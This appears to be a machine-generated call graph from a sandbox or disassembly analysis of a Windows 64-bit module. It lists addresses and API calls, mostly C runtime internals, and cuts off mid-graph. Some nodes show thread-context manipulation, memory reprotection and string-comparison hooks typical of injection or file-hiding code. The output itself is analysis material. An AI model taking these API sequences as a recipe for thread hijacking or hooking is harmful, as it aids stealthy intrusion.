265b3c0b786 9831->9832 9837 265b3c088d8 __CxxCallCatchBlock 4 API calls 9832->9837 9838 265b3c0b7af __CxxCallCatchBlock 9832->9838 9833 265b3c08c04 _CallSETranslator 4 API calls 9834 265b3c0b7c2 9833->9834 9835 265b3c08c04 _CallSETranslator 4 API calls 9834->9835 9836 265b3c0b7cb 9835->9836 9837->9838 9838->9833 9840 265b3c08c04 _CallSETranslator 4 API calls 9839->9840 9841 265b3c09fe9 9840->9841 9842 265b3c08c04 _CallSETranslator 4 API calls 9841->9842 9843 265b3c09ff4 9841->9843 9842->9843 9844 265b3c08c04 _CallSETranslator 4 API calls 9843->9844 9845 265b3c0a005 9844->9845 9845->9829 9845->9830 9849 265b3c12010 9850 265b3c0f200 38 API calls 9849->9850 9851 265b3c12019 9850->9851 9852 265b3c02810 9854 265b3c02856 9852->9854 9853 265b3c028bc 9854->9853 9855 265b3c03858 StrCmpNIW 9854->9855 9855->9854 9856 265b3c0d814 9857 265b3c0d84e 9856->9857 9858 265b3c0d876 RtlCaptureContext 9857->9858 9860 265b3c0d8ab capture_previous_context 9858->9860 9859 265b3c0d8e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9861 265b3c0d938 9859->9861 9860->9859 9862 265b3c07950 _log10_special 2 API calls 9861->9862 9863 265b3c0d957 9862->9863 8354 265b3c0b998 8359 265b3c0b8cb __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8354->8359 8355 265b3c0b9bf 8366 265b3c08c04 8355->8366 8357 265b3c0b9c4 8358 265b3c08c04 _CallSETranslator 4 API calls 8357->8358 8360 265b3c0b9cf __FrameHandler3::GetHandlerSearchState 8357->8360 8358->8360 8359->8355 8359->8360 8361 265b3c0a068 LoadLibraryExW LoadLibraryExW FreeLibrary TlsSetValue Is_bad_exception_allowed 8359->8361 8363 265b3c0a090 8359->8363 8361->8359 8364 265b3c08c04 _CallSETranslator 4 API calls 8363->8364 8365 265b3c0a09e 8364->8365 8365->8359 8369 265b3c08c20 8366->8369 8368 265b3c08c0d 8368->8357 8370 265b3c08c3f __vcrt_InitializeCriticalSectionEx 8369->8370 8375 265b3c08c38 __std_exception_copy _CallSETranslator 8369->8375 8370->8375 8377 265b3c0a370 8370->8377 8372 265b3c08c72 _CallSETranslator 8374 265b3c0a370 _CallSETranslator 4 API calls 8372->8374 8372->8375 8376 265b3c08c99 8372->8376 8373 265b3c0a370 _CallSETranslator 4 API calls 8373->8375 8374->8376 8375->8368 8376->8373 8376->8375 8382 265b3c0a148 8377->8382 8379 265b3c0a39e 8380 265b3c0a3b0 TlsSetValue 8379->8380 8381 265b3c0a3a8 8379->8381 8380->8381 8381->8372 8386 265b3c0a232 __vcrt_InitializeCriticalSectionEx 8382->8386 8387 265b3c0a18c __vcrt_InitializeCriticalSectionEx 8382->8387 8383 265b3c0a1ba LoadLibraryExW 8384 265b3c0a259 8383->8384 8383->8387 8385 265b3c0a270 FreeLibrary 8384->8385 8384->8386 8385->8386 8386->8379 8387->8383 8387->8386 8388 265b3c0a1fd LoadLibraryExW 8387->8388 8388->8384 8388->8387 9282 265b3c0d698 9283 265b3c0d6a8 9282->9283 9284 265b3c0d510 __std_exception_copy 7 API calls 9283->9284 9285 265b3c0d6b3 __vcrt_uninitialize_ptd 9283->9285 9284->9285 9864 265b3c11a18 9865 265b3c11a20 9864->9865 9866 265b3c11a35 9865->9866 9868 265b3c11a4e 9865->9868 9867 265b3c0dc1c __std_exception_copy 7 API calls 9866->9867 9869 265b3c11a3a 9867->9869 9871 265b3c0e724 17 API calls 9868->9871 9872 265b3c11a45 9868->9872 9870 265b3c0dae0 _invalid_parameter_noinfo 20 API calls 9869->9870 9870->9872 9871->9872 8389 265b3c15d99 8390 265b3c08c04 _CallSETranslator 4 API calls 8389->8390 8391 265b3c15da7 8390->8391 8392 265b3c15db2 8391->8392 8393 265b3c08c04 _CallSETranslator 4 API calls 8391->8393 8393->8392 9032 265b3c13b1b 9033 265b3c13b5b 9032->9033 9034 265b3c13dc0 9032->9034 9033->9034 9035 265b3c13da2 9033->9035 9038 265b3c13b8f 9033->9038 9037 265b3c148d0 _log10_special 10 API calls 9034->9037 9039 265b3c13db6 9034->9039 9040 265b3c148d0 9035->9040 9037->9039 9043 265b3c148f0 9040->9043 9044 265b3c1490a 9043->9044 9045 265b3c148eb 9044->9045 9047 265b3c14730 9044->9047 9045->9039 9048 265b3c14770 _log10_special 9047->9048 9050 265b3c147dc _log10_special 9048->9050 9058 265b3c149f0 9048->9058 9051 265b3c14819 9050->9051 9052 265b3c147e9 9050->9052 9065 265b3c14d20 9051->9065 9061 265b3c1460c 9052->9061 9055 265b3c14817 _log10_special 9056 265b3c07950 _log10_special 2 API calls 9055->9056 9057 265b3c14841 9056->9057 9057->9045 9071 265b3c14a18 9058->9071 9062 265b3c14650 _log10_special 9061->9062 9063 265b3c14665 9062->9063 9064 265b3c14d20 _log10_special 7 API calls 9062->9064 9063->9055 9064->9063 9066 265b3c14d40 9065->9066 9067 265b3c14d29 9065->9067 9068 265b3c0dc1c __std_exception_copy 7 API calls 9066->9068 9069 265b3c14d38 9067->9069 9070 265b3c0dc1c __std_exception_copy 7 API calls 9067->9070 9068->9069 9069->9055 9070->9069 9072 265b3c14a57 _raise_exc _clrfp 9071->9072 9073 265b3c14c6c RaiseException 9072->9073 9074 265b3c14a12 9073->9074 9074->9050 9286 265b3c0589c 9287 265b3c058a3 9286->9287 9288 265b3c058d0 VirtualProtect 9287->9288 9290 265b3c057e0 9287->9290 9289 265b3c058f9 GetLastError 9288->9289 9288->9290 9289->9290 8394 265b3c0fda0 GetProcessHeap 8395 265b3c15b9f 8396 265b3c15bb7 8395->8396 8402 265b3c15c22 8395->8402 8397 265b3c08c04 _CallSETranslator 4 API calls 8396->8397 8396->8402 8398 265b3c15c04 8397->8398 8399 265b3c08c04 _CallSETranslator 4 API calls 8398->8399 8400 265b3c15c19 8399->8400 8403 265b3c0cc18 8400->8403 8406 265b3c0d398 8403->8406 8405 265b3c0cc21 _invalid_parameter_noinfo 8407 265b3c0d3ad __vcrt_InitializeCriticalSectionEx 8406->8407 8408 265b3c0d3d9 FlsSetValue 8407->8408 8409 265b3c0d3bc FlsGetValue 8407->8409 8411 265b3c0d3eb 8408->8411 8422 265b3c0d3c9 _CallSETranslator 8408->8422 8410 265b3c0d3d3 8409->8410 8409->8422 8410->8408 8441 265b3c0dc3c 8411->8441 8414 265b3c0d418 FlsSetValue 8418 265b3c0d436 8414->8418 8419 265b3c0d424 FlsSetValue 8414->8419 8415 265b3c0d408 FlsSetValue 8417 265b3c0d411 8415->8417 8416 265b3c0d452 8416->8405 8447 265b3c0dcb4 8417->8447 8452 265b3c0d104 8418->8452 8419->8417 8422->8416 8425 265b3c0d498 FlsSetValue 8422->8425 8426 265b3c0d47d FlsGetValue 8422->8426 8428 265b3c0d4a5 8425->8428 8429 265b3c0d48a 8425->8429 8427 265b3c0d492 8426->8427 8426->8429 8427->8425 8430 265b3c0dc3c _invalid_parameter_noinfo 7 API calls 8428->8430 8429->8405 8431 265b3c0d4b4 8430->8431 8432 265b3c0d4d2 FlsSetValue 8431->8432 8433 265b3c0d4c2 FlsSetValue 8431->8433 8435 265b3c0d4de FlsSetValue 8432->8435 8436 265b3c0d4f0 8432->8436 8434 265b3c0d4cb 8433->8434 8437 265b3c0dcb4 __free_lconv_num 7 API calls 8434->8437 8435->8434 8438 265b3c0d104 _invalid_parameter_noinfo 7 API calls 8436->8438 8437->8429 8439 265b3c0d4f8 8438->8439 8439->8429 8440 265b3c0dcb4 __free_lconv_num 7 API calls 8439->8440 8440->8429 8445 265b3c0dc4d _invalid_parameter_noinfo 8441->8445 8442 265b3c0dc9e 8457 265b3c0dc1c 8442->8457 8444 265b3c0d3fa 8444->8414 8444->8415 8445->8442 8445->8444 8446 265b3c0bdcc _invalid_parameter_noinfo 2 API calls 8445->8446 8446->8445 8448 265b3c0dcb9 HeapFree 8447->8448 8449 265b3c0dcea 8447->8449 8448->8449 8450 265b3c0dcd4 __vcrt_InitializeCriticalSectionEx __free_lconv_num 8448->8450 8449->8422 8451 265b3c0dc1c __std_exception_copy 6 API calls 8450->8451 8451->8449 8476 265b3c0cfdc 8452->8476 8460 265b3c0d510 8457->8460 8459 265b3c0dc25 8459->8444 8462 265b3c0d525 __vcrt_InitializeCriticalSectionEx 8460->8462 8461 265b3c0d551 FlsSetValue 8463 265b3c0d563 8461->8463 8466 265b3c0d541 _CallSETranslator 8461->8466 8462->8461 8462->8466 8464 265b3c0dc3c _invalid_parameter_noinfo 3 API calls 8463->8464 8465 265b3c0d572 8464->8465 8467 265b3c0d590 FlsSetValue 8465->8467 8468 265b3c0d580 FlsSetValue 8465->8468 8466->8459 8469 265b3c0d59c FlsSetValue 8467->8469 8470 265b3c0d5ae 8467->8470 8471 265b3c0d589 8468->8471 8469->8471 8472 265b3c0d104 _invalid_parameter_noinfo 3 API calls 8470->8472 8473 265b3c0dcb4 __free_lconv_num 3 API calls 8471->8473 8474 265b3c0d5b6 8472->8474 8473->8466 8475 265b3c0dcb4 __free_lconv_num 3 API calls 8474->8475 8475->8466 8477 265b3c0cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 8476->8477 8478 265b3c0cff8 8477->8478 8488 265b3c0cf60 LeaveCriticalSection 8478->8488 8489 265b3c16248 8488->8489 9291 265b3c07aa0 9292 265b3c07aa9 __scrt_release_startup_lock 9291->9292 9294 265b3c07aad 9292->9294 9295 265b3c0c4cc 9292->9295 9296 265b3c0c4ec 9295->9296 9325 265b3c0c503 9295->9325 9297 265b3c0c50a 9296->9297 9298 265b3c0c4f4 9296->9298 9326 265b3c0f200 9297->9326 9299 265b3c0dc1c __std_exception_copy 7 API calls 9298->9299 9301 265b3c0c4f9 9299->9301 9304 265b3c0dae0 _invalid_parameter_noinfo 20 API calls 9301->9304 9304->9325 9310 265b3c0c599 9313 265b3c0c2a4 17 API calls 9310->9313 9311 265b3c0c581 9312 265b3c0dc1c __std_exception_copy 7 API calls 9311->9312 9314 265b3c0c586 9312->9314 9318 265b3c0c5b5 9313->9318 9316 265b3c0dcb4 __free_lconv_num 7 API calls 9314->9316 9315 265b3c0c5bb 9317 265b3c0dcb4 __free_lconv_num 7 API calls 9315->9317 9316->9325 9317->9325 9318->9315 9319 265b3c0c5e7 9318->9319 9320 265b3c0c600 9318->9320 9321 265b3c0dcb4 __free_lconv_num 7 API calls 9319->9321 9323 265b3c0dcb4 __free_lconv_num 7 API calls 9320->9323 9322 265b3c0c5f0 9321->9322 9324 265b3c0dcb4 __free_lconv_num 7 API calls 9322->9324 9323->9315 9324->9325 9325->9294 9327 265b3c0c50f 9326->9327 9328 265b3c0f20d 9326->9328 9332 265b3c0e8e4 GetModuleFileNameW 9327->9332 9356 265b3c0d46c 9328->9356 9330 265b3c0f23c 9373 265b3c0eed8 9330->9373 9333 265b3c0e929 __vcrt_InitializeCriticalSectionEx 9332->9333 9334 265b3c0e93d 9332->9334 9532 265b3c0db90 9333->9532 9335 265b3c0e724 17 API calls 9334->9335 9336 265b3c0e96b 9335->9336 9343 265b3c0e97c 9336->9343 9537 265b3c0fb18 9336->9537 9340 265b3c0e936 9341 265b3c07950 _log10_special 2 API calls 9340->9341 9342 265b3c0c526 9341->9342 9344 265b3c0c2a4 9342->9344 9540 265b3c0e7c8 9343->9540 9346 265b3c0c2e2 9344->9346 9348 265b3c0c34e 9346->9348 9549 265b3c0f5b0 9346->9549 9347 265b3c0c43f 9350 265b3c0c46c 9347->9350 9348->9347 9349 265b3c0f5b0 17 API calls 9348->9349 9349->9348 9351 265b3c0c4bc 9350->9351 9352 265b3c0c484 9350->9352 9351->9310 9351->9311 9352->9351 9353 265b3c0dc3c _invalid_parameter_noinfo 7 API calls 9352->9353 9354 265b3c0c4b2 9353->9354 9355 265b3c0dcb4 __free_lconv_num 7 API calls 9354->9355 9355->9351 9357 265b3c0d498 FlsSetValue 9356->9357 9358 265b3c0d47d FlsGetValue 9356->9358 9360 265b3c0d4a5 9357->9360 9362 265b3c0d48a 9357->9362 9359 265b3c0d492 9358->9359 9358->9362 9359->9357 9361 265b3c0dc3c _invalid_parameter_noinfo 7 API calls 9360->9361 9363 265b3c0d4b4 9361->9363 9362->9330 9364 265b3c0d4d2 FlsSetValue 9363->9364 9365 265b3c0d4c2 FlsSetValue 9363->9365 9367 265b3c0d4de FlsSetValue 9364->9367 9368 265b3c0d4f0 9364->9368 9366 265b3c0d4cb 9365->9366 9369 265b3c0dcb4 __free_lconv_num 7 API calls 9366->9369 9367->9366 9370 265b3c0d104 _invalid_parameter_noinfo 7 API calls 9368->9370 9369->9362 9371 265b3c0d4f8 9370->9371 9371->9362 9372 265b3c0dcb4 __free_lconv_num 7 API calls 9371->9372 9372->9362 9396 265b3c0f148 9373->9396 9380 265b3c0ef43 9381 265b3c0dcb4 __free_lconv_num 7 API calls 9380->9381 9392 265b3c0ef2a 9381->9392 9382 265b3c0ef52 9382->9382 9421 265b3c0f27c 9382->9421 9385 265b3c0f04e 9386 265b3c0dc1c __std_exception_copy 7 API calls 9385->9386 9387 265b3c0f053 9386->9387 9389 265b3c0dcb4 __free_lconv_num 7 API calls 9387->9389 9388 265b3c0f0a9 9395 265b3c0f110 9388->9395 9432 265b3c0ea08 9388->9432 9389->9392 9390 265b3c0f068 9390->9388 9393 265b3c0dcb4 __free_lconv_num 7 API calls 9390->9393 9391 265b3c0dcb4 __free_lconv_num 7 API calls 9391->9392 9392->9327 9393->9388 9395->9391 9397 265b3c0f16b 9396->9397 9398 265b3c0cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 9397->9398 9403 265b3c0f175 9397->9403 9401 265b3c0f188 9398->9401 9399 265b3c0f1c1 9400 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 9399->9400 9400->9403 9401->9399 9404 265b3c0dcb4 __free_lconv_num 7 API calls 9401->9404 9402 265b3c0ef0d 9408 265b3c0ebd8 9402->9408 9403->9402 9405 265b3c0d46c 12 API calls 9403->9405 9404->9399 9406 265b3c0f23c 9405->9406 9407 265b3c0eed8 38 API calls 9406->9407 9407->9402 9447 265b3c0e724 9408->9447 9411 265b3c0ebf8 GetOEMCP 9413 265b3c0ec1f 9411->9413 9412 265b3c0ec0a 9412->9413 9414 265b3c0ec0f GetACP 9412->9414 9413->9392 9415 265b3c0cf7c 9413->9415 9414->9413 9416 265b3c0cfc7 9415->9416 9419 265b3c0cf8b _invalid_parameter_noinfo 9415->9419 9417 265b3c0dc1c __std_exception_copy 7 API calls 9416->9417 9418 265b3c0cfc5 9417->9418 9418->9380 9418->9382 9419->9416 9419->9418 9420 265b3c0bdcc _invalid_parameter_noinfo 2 API calls 9419->9420 9420->9419 9422 265b3c0ebd8 19 API calls 9421->9422 9423 265b3c0f2a9 9422->9423 9424 265b3c0f3ff 9423->9424 9426 265b3c0f2e6 IsValidCodePage 9423->9426 9430 265b3c0f300 9423->9430 9425 265b3c07950 _log10_special 2 API calls 9424->9425 9427 265b3c0f045 9425->9427 9426->9424 9428 265b3c0f2f7 9426->9428 9427->9385 9427->9390 9429 265b3c0f326 GetCPInfo 9428->9429 9428->9430 9429->9424 9429->9430 9463 265b3c0ecf0 9430->9463 9433 265b3c0cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 9432->9433 9434 265b3c0ea24 9433->9434 9435 265b3c0dc1c __std_exception_copy 7 API calls 9434->9435 9438 265b3c0ea51 9434->9438 9436 265b3c0eac0 9435->9436 9437 265b3c0dae0 _invalid_parameter_noinfo 20 API calls 9436->9437 9437->9438 9439 265b3c0dc1c __std_exception_copy 7 API calls 9438->9439 9443 265b3c0eb03 9438->9443 9440 265b3c0eb61 9439->9440 9441 265b3c0dae0 _invalid_parameter_noinfo 20 API calls 9440->9441 9441->9443 9442 265b3c0eb9d 9444 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 9442->9444 9443->9442 9446 265b3c0dcb4 __free_lconv_num 7 API calls 9443->9446 9445 265b3c0ebcb 9444->9445 9445->9395 9446->9442 9448 265b3c0e748 9447->9448 9454 265b3c0e743 9447->9454 9449 265b3c0d398 _invalid_parameter_noinfo 17 API calls 9448->9449 9448->9454 9450 265b3c0e763 9449->9450 9455 265b3c1096c 9450->9455 9454->9411 9454->9412 9456 265b3c0e786 9455->9456 9457 265b3c10981 9455->9457 9459 265b3c109d8 9456->9459 9457->9456 9458 265b3c10fcc _invalid_parameter_noinfo 17 API calls 9457->9458 9458->9456 9460 265b3c109ed 9459->9460 9462 265b3c10a00 9459->9462 9461 265b3c0f260 _invalid_parameter_noinfo 17 API calls 9460->9461 9460->9462 9461->9462 9462->9454 9464 265b3c0ed2d GetCPInfo 9463->9464 9473 265b3c0ee23 9463->9473 9467 265b3c0ed40 9464->9467 9464->9473 9465 265b3c07950 _log10_special 2 API calls 9466 265b3c0eec2 9465->9466 9466->9424 9474 265b3c11ab4 9467->9474 9473->9465 9475 265b3c0e724 17 API calls 9474->9475 9476 265b3c11af6 9475->9476 9494 265b3c0f5ec 9476->9494 9496 265b3c0f5f5 MultiByteToWideChar 9494->9496 9533 265b3c0d510 __std_exception_copy 7 API calls 9532->9533 9534 265b3c0db9d __free_lconv_num 9533->9534 9535 265b3c0d510 __std_exception_copy 7 API calls 9534->9535 9536 265b3c0dbbf 9535->9536 9536->9340 9538 265b3c0f904 3 API calls 9537->9538 9539 265b3c0fb38 9538->9539 9539->9343 9541 265b3c0e807 9540->9541 9542 265b3c0e7ec 9540->9542 9543 265b3c0e80c 9541->9543 9544 265b3c0e86a __vcrt_InitializeCriticalSectionEx 9541->9544 9542->9340 9543->9542 9545 265b3c0dc1c __std_exception_copy 7 API calls 9543->9545 9544->9542 9546 265b3c0db90 7 API calls 9544->9546 9545->9542 9547 265b3c0e877 9546->9547 9548 265b3c0dc1c __std_exception_copy 7 API calls 9547->9548 9548->9542 9550 265b3c0f53c 9549->9550 9551 265b3c0e724 17 API calls 9550->9551 9552 265b3c0f560 9551->9552 9552->9346 9553 265b3c0caa4 9556 265b3c0c854 9553->9556 9563 265b3c0c81c 9556->9563 9564 265b3c0c82c 9563->9564 9565 265b3c0c831 9563->9565 9566 265b3c0c7d8 7 API calls 9564->9566 9567 265b3c0c838 9565->9567 9566->9565 9568 265b3c0c848 9567->9568 9569 265b3c0c84d 9567->9569 9570 265b3c0c7d8 7 API calls 9568->9570 9571 265b3c0c7d8 9569->9571 9570->9569 9575 265b3c0c7dd 9571->9575 9576 265b3c0c80e 9571->9576 9572 265b3c0c806 9574 265b3c0dcb4 __free_lconv_num 7 API calls 9572->9574 9573 265b3c0dcb4 __free_lconv_num 7 API calls 9573->9575 9574->9576 9575->9572 9575->9573 8606 265b3c029a4 8608 265b3c029f8 8606->8608 8607 265b3c02a13 8608->8607 8610 265b3c03144 8608->8610 8611 265b3c031da 8610->8611 8613 265b3c03169 8610->8613 8611->8607 8612 265b3c03858 StrCmpNIW 8612->8613 8613->8611 8613->8612 8614 265b3c01ce8 StrCmpIW StrCmpW 8613->8614 8614->8613 9577 265b3c014a4 9578 265b3c014e6 GetProcessHeap HeapFree GetProcessHeap HeapFree 9577->9578 9579 265b3c014c6 GetProcessHeap HeapFree 9577->9579 9580 265b3c16180 9578->9580 9579->9578 9579->9579 9873 265b3c02a28 9875 265b3c02a85 9873->9875 9874 265b3c02aa0 9875->9874 9876 265b3c031f8 3 API calls 9875->9876 9876->9874 9075 265b3c07b2c 9077 265b3c07b50 __scrt_release_startup_lock 9075->9077 9076 265b3c0be55 9077->9076 9078 265b3c0d510 __std_exception_copy 7 API calls 9077->9078 9079 265b3c0be7e _invalid_parameter_noinfo 9078->9079 8615 265b3c101b0 8617 265b3c10207 8615->8617 8619 265b3c101e0 8615->8619 8616 265b3c0d510 __std_exception_copy 7 API calls 8622 265b3c101f4 8616->8622 8618 265b3c102dc 8617->8618 8621 265b3c0cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 8617->8621 8623 265b3c10410 8618->8623 8625 265b3c10343 8618->8625 8631 265b3c1030a 8618->8631 8619->8616 8619->8617 8619->8622 8620 265b3c10244 8621->8618 8622->8617 8622->8620 8624 265b3c10289 8622->8624 8626 265b3c1041d 8623->8626 8627 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 8623->8627 8628 265b3c0dc1c __std_exception_copy 7 API calls 8624->8628 8629 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 8625->8629 8636 265b3c103a1 8625->8636 8627->8626 8630 265b3c1028e 8628->8630 8629->8636 8638 265b3c0dae0 8630->8638 8631->8625 8632 265b3c0d398 _invalid_parameter_noinfo 17 API calls 8631->8632 8634 265b3c10333 8632->8634 8635 265b3c0d398 _invalid_parameter_noinfo 17 API calls 8634->8635 8635->8625 8637 265b3c0d398 17 API calls _invalid_parameter_noinfo 8636->8637 8637->8636 8641 265b3c0d978 8638->8641 8642 265b3c0d9a3 8641->8642 8649 265b3c0da14 8642->8649 8644 265b3c0d9ca 8645 265b3c0d9ed 8644->8645 8655 265b3c0cd10 8644->8655 8646 265b3c0da02 8645->8646 8648 265b3c0cd10 _invalid_parameter_noinfo 20 API calls 8645->8648 8646->8620 8648->8646 8666 265b3c0d75c 8649->8666 8651 265b3c0da4f _invalid_parameter_noinfo 8651->8644 8652 265b3c0da3e _invalid_parameter_noinfo 8652->8651 8653 265b3c0d978 _invalid_parameter_noinfo 20 API calls 8652->8653 8654 265b3c0daf9 8653->8654 8654->8644 8656 265b3c0cd68 8655->8656 8657 265b3c0cd1f __vcrt_InitializeCriticalSectionEx 8655->8657 8656->8645 8658 265b3c0d5d8 _invalid_parameter_noinfo 10 API calls 8657->8658 8659 265b3c0cd4e _CallSETranslator 8658->8659 8659->8656 8660 265b3c0cd10 _invalid_parameter_noinfo 20 API calls 8659->8660 8661 265b3c0cd97 8660->8661 8684 265b3c109a0 8661->8684 8667 265b3c0d778 __vcrt_InitializeCriticalSectionEx 8666->8667 8669 265b3c0d7a3 _CallSETranslator 8666->8669 8670 265b3c0d5d8 8667->8670 8669->8652 8671 265b3c0d5f7 FlsGetValue 8670->8671 8673 265b3c0d60c 8670->8673 8672 265b3c0d604 8671->8672 8671->8673 8672->8669 8673->8672 8674 265b3c0dc3c _invalid_parameter_noinfo 7 API calls 8673->8674 8675 265b3c0d62e 8674->8675 8676 265b3c0d64c FlsSetValue 8675->8676 8677 265b3c0d63c 8675->8677 8678 265b3c0d658 FlsSetValue 8676->8678 8679 265b3c0d66a 8676->8679 8682 265b3c0dcb4 __free_lconv_num 7 API calls 8677->8682 8678->8677 8680 265b3c0d104 _invalid_parameter_noinfo 7 API calls 8679->8680 8681 265b3c0d672 8680->8681 8683 265b3c0dcb4 __free_lconv_num 7 API calls 8681->8683 8682->8672 8683->8672 8685 265b3c109b9 8684->8685 8686 265b3c0cdbf 8684->8686 8685->8686 8692 265b3c10fcc 8685->8692 8688 265b3c10a0c 8686->8688 8689 265b3c10a25 8688->8689 8690 265b3c0cdcf 8688->8690 8689->8690 8705 265b3c0f260 8689->8705 8690->8645 8693 265b3c0d398 _invalid_parameter_noinfo 17 API calls 8692->8693 8694 265b3c10fdb 8693->8694 8695 265b3c0cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 8694->8695 8700 265b3c11021 8694->8700 8696 265b3c11004 8695->8696 8701 265b3c1103c 8696->8701 8699 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 8699->8700 8700->8686 8702 265b3c1104e Concurrency::details::SchedulerProxy::DeleteThis 8701->8702 8704 265b3c11014 8701->8704 8703 265b3c10d24 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8702->8703 8702->8704 8703->8704 8704->8699 8706 265b3c0d398 _invalid_parameter_noinfo 17 API calls 8705->8706 8707 265b3c0f269 8706->8707 8708 265b3c115b0 8709 265b3c115cf 8708->8709 8710 265b3c11648 8709->8710 8713 265b3c115df 8709->8713 8716 265b3c081fc 8710->8716 8714 265b3c07950 _log10_special 2 API calls 8713->8714 8715 265b3c1163e 8714->8715 8719 265b3c08210 IsProcessorFeaturePresent 8716->8719 8718 265b3c0820a 8720 265b3c08227 8719->8720 8723 265b3c082ac RtlCaptureContext 8720->8723 8722 265b3c0823b 8722->8718 8724 265b3c082d7 capture_previous_context 8723->8724 8724->8722 9581 265b3c110b0 9582 265b3c110dd 9581->9582 9583 265b3c0dc1c __std_exception_copy 7 API calls 9582->9583 9588 265b3c110f2 _invalid_parameter_noinfo 9582->9588 9584 265b3c110e7 9583->9584 9585 265b3c0dae0 _invalid_parameter_noinfo 20 API calls 9584->9585 9585->9588 9586 265b3c07950 _log10_special 2 API calls 9587 265b3c114b0 9586->9587 9588->9586 8725 265b3c0b5b0 8728 265b3c089a0 8725->8728 8727 265b3c0b5d9 8729 265b3c089c1 8728->8729 8730 265b3c089f6 __std_exception_copy 8728->8730 8729->8730 8732 265b3c0cc58 8729->8732 8730->8727 8733 265b3c0cc65 8732->8733 8734 265b3c0cc6f 8732->8734 8733->8734 8739 265b3c0cc8a 8733->8739 8735 265b3c0dc1c __std_exception_copy 7 API calls 8734->8735 8736 265b3c0cc76 8735->8736 8737 265b3c0dae0 _invalid_parameter_noinfo 20 API calls 8736->8737 8738 265b3c0cc82 8737->8738 8738->8730 8739->8738 8740 265b3c0dc1c __std_exception_copy 7 API calls 8739->8740 8740->8736 9877 265b3c12031 9878 265b3c0dc1c __std_exception_copy 7 API calls 9877->9878 9879 265b3c12036 9878->9879 9880 265b3c0dae0 _invalid_parameter_noinfo 20 API calls 9879->9880 9881 265b3c12041 9880->9881 9589 265b3c05cb3 9590 265b3c05cc0 9589->9590 9591 265b3c05ccc GetThreadContext 9590->9591 9592 265b3c05e2a 9590->9592 9591->9592 9593 265b3c05cf2 9591->9593 9595 265b3c05f0e 9592->9595 9596 265b3c05e51 VirtualProtect FlushInstructionCache 9592->9596 9593->9592 9594 265b3c05d19 9593->9594 9600 265b3c05d9d 9594->9600 9601 265b3c05d76 SetThreadContext 9594->9601 9597 265b3c05f2e 9595->9597 9599 265b3c043f0 VirtualFree 9595->9599 9596->9592 9598 265b3c04e00 3 API calls 9597->9598 9604 265b3c05f33 9598->9604 9599->9597 9601->9600 9602 265b3c05f87 9605 265b3c07950 _log10_special 2 API calls 9602->9605 9603 265b3c05f47 ResumeThread 9603->9604 9604->9602 9604->9603 9606 265b3c05fcf 9605->9606 8191 265b3c02034 8193 265b3c02065 8191->8193 8192 265b3c02146 8193->8192 8194 265b3c0217b 8193->8194 8200 265b3c02089 8193->8200 8195 265b3c021ef 8194->8195 8196 265b3c02180 8194->8196 8195->8192 8199 265b3c02f18 9 API calls 8195->8199 8209 265b3c02f18 GetProcessHeap 8196->8209 8198 265b3c020c1 StrCmpNIW 8198->8200 8199->8192 8200->8192 8200->8198 8202 265b3c01bfc 8200->8202 8203 265b3c01c97 8202->8203 8204 265b3c01c23 GetProcessHeap 8202->8204 8203->8200 8205 265b3c01c49 _invalid_parameter_noinfo 8204->8205 8205->8203 8206 265b3c01c7f GetProcessHeap HeapFree 8205->8206 8207 265b3c01534 2 API calls 8205->8207 8206->8203 8208 265b3c01c76 8207->8208 8208->8206 8211 265b3c02f54 _invalid_parameter_noinfo 8209->8211 8210 265b3c03029 GetProcessHeap HeapFree 8210->8192 8211->8210 8212 265b3c03024 8211->8212 8213 265b3c02fb6 StrCmpNIW 8211->8213 8214 265b3c01bfc 5 API calls 8211->8214 8212->8210 8213->8211 8214->8211 9882 265b3c15c35 9883 265b3c08c04 _CallSETranslator 4 API calls 9882->9883 9884 265b3c15c4d 9883->9884 9885 265b3c08c04 _CallSETranslator 4 API calls 9884->9885 9886 265b3c15c68 9885->9886 9887 265b3c08c04 _CallSETranslator 4 API calls 9886->9887 9888 265b3c15c7c 9887->9888 9889 265b3c08c04 _CallSETranslator 4 API calls 9888->9889 9890 265b3c15cbe 9889->9890 9080 265b3c02338 9082 265b3c023b6 9080->9082 9081 265b3c024d3 9082->9081 9083 265b3c0241b GetFileType 9082->9083 9084 265b3c02429 StrCpyW 9083->9084 9085 265b3c0243d 9083->9085 9089 265b3c0244a 9084->9089 9086 265b3c01a48 4 API calls 9085->9086 9086->9089 9087 265b3c03858 StrCmpNIW 9087->9089 9088 265b3c03058 4 API calls 9088->9089 9089->9081 9089->9087 9089->9088 9090 265b3c01cb4 2 API calls 9089->9090 9090->9089 9091 265b3c0cb3c 9092 265b3c0dcb4 __free_lconv_num 7 API calls 9091->9092 9093 265b3c0cb4c 9092->9093 9094 265b3c0dcb4 __free_lconv_num 7 API calls 9093->9094 9095 265b3c0cb60 9094->9095 9096 265b3c0dcb4 __free_lconv_num 7 API calls 9095->9096 9097 265b3c0cb74 9096->9097 9098 265b3c0dcb4 __free_lconv_num 7 API calls 9097->9098 9099 265b3c0cb88 9098->9099 9891 265b3c0783c 9892 265b3c07858 9891->9892 9893 265b3c0785d 9891->9893 9895 265b3c07970 9892->9895 9896 265b3c07a07 9895->9896 9897 265b3c07993 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9895->9897 9896->9893 9897->9896 8744 265b3c0ffc0 8745 265b3c0cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 8744->8745 8746 265b3c0ffd0 8745->8746 8755 265b3c1227c 8746->8755 8750 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 8752 265b3c0fff3 8750->8752 8754 265b3c0ffe7 8754->8750 8756 265b3c1229b 8755->8756 8757 265b3c122c4 